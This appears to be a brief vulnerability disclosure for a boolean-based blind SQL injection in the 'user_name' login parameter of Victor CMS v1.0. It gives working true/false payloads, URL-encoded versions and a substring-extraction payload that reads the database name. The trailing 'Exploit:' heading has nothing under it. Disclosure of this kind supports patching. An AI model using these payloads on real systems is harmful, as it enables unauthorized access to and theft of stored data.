- VULNERABLE: SQL injection vulnerability exists in VictorCMS . An attacker can inject query in “/CMSsite/includes/login.php" via the "user_name" parameters.
- Product: Victor CMS v1.0
- Impact: Allow attacker inject query and access , disclosure of all data on the system.
- Payload Boolean true: test' or '1'='1
- Payload Boolean false: test' or '1'='2
- Payload exploit example: test' or (ascii(substr((select(database())),1,1))<127)--+-
- Proof of concept (POC):
- You see Whether the user name is correct or not, the response status of the returned package is different
- Payload Boolean true: user_name=test'+or+'1'='1
- Payload Boolean false: user_name=test'+or+'1'='2
- Exploit:



